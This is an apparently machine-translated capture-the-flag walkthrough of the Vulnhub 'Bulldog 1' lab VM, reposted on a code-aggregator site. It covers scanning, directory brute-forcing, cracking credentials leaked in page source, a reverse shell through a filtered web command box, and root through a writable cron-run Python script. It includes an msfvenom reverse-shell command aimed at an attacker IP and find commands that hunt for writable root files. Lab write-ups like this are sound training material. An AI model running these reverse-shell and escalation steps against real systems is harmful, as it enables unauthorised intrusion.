Vulnhub drone: BULLDOG_ 1

Language 2023-06-21 09:22:03 views: null

Table of contents

introduce

Series: Bulldog (2 units in this series)
Release date: August 28, 2017
Difficulty: Intermediate
Operating environment: Virtualbox
Goal: Obtain root permission
Learning:

  • directory blasting
  • Password cracking
  • bash rebound shell
  • Python file privilege escalation
  • Scheduled task privilege escalation

Target machine address: https://www.vulnhub.com/entry/bulldog-1,211/

collect message

host discovery

netdiscover host discovery

sudo netdiscover -i eth1 -r 192.168.56.0/24

host information detection

nmap -p- 192.168.56.106
nmap -p 23,80,8080 -A 192.168.56.106

image.png

website detection

The homepage of the website is a static page. There is no valuable information in the source code of the page, and the directory is blasted directly.
image.png

directory blasting

dirsearch -u http://192.168.56.106/ --full-url -x 404

image.png
Blow out a background address and a dev address, visit http://192.168.56.106/dev/
image.png
to view the source code of the page and find some passwords
image.png
Use the online website to decrypt:
image.png
get two sets of account secrets:

nick:bulldog
sarah:bulldoglover

command execution

Log in to the background: http://192.168.56.106/admin/
Then you can access: http://192.168.56.106/dev/shell/
It seems to be a command execution vulnerability, but it limits the commands that can be used
image.png
to see the running commands There echo, it should be possible bashto implement a reverse shell with the help of
image.png

Scheduled task privilege escalation

A sensitive file is found here. After searching, it is found that this sensitive file is a crontab scheduled task. The execution plan of the task is to execute once every minute. The command is to be /.hiddenAVDirectory/AVApplication.pyexecuted by the root user.
Next, you can refer to the previous operation: https://www.yuque.com/u1881995/xwfvho/spl1fgit20302ozi#nTG0d

# 搜索属于root的所有文件。文件所有者是root、文件具有可执行权限、其他用户具有可写权限 的所有文件
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

# 在根目录以递归方式查找文件名中包含 AVApplication.py 的所有文件,并输出文件名及相应行号
grep -rnw '/' -e 'AVApplication.py' 2> /dev/null

image.png

  1. Generate python reverse shell command and write it into py file
msfvenom -p cmd/unix/reverse_python lhost=192.168.229.128 lport=4455 -f raw

Here, use the vi editor to open the py file, and write the commands for the rebound shell generated above. This is a confusion problem, don't worry about it
image.png

  1. Wait up to 1 minute, you will get the shell

image.png

Guess you like

Origin blog.csdn.net/weixin_44288604/article/details/131250526
Recommended
微软回应中国区AI团队“打包赴美”传闻
Ranking
How to use ChatGPT to write 100,000+ hot articles for public accounts (includes prompt words)
sudo echo command execution Permission denied
ADO: Using Transactions to Operate Oracle Database
[Java] [Class and Object] equals, hashCode, clone methods
Linux virtual host function
Порт управления rabbitmq открыт
on,where
jQuery WeUI
How can there be a weed pilot in Hangzhou?
tcp / ip model four
Daily
More
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

Code World

© 2018 codetd.com